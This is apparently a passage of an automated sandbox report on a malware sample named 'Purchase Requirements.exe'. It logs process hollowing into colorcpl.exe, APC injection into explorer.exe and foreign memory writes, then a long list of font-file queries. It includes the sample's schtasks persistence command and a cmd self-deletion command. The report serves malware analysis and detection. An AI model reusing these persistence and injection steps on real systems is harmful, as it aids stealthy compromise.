Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 60000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B42008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp' Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' Jump to behavior
Source: explorer.exe, 00000008.00000000.728424722.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.731907032.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Users\user\Desktop\Purchase Requirements.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Purchase Requirements.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
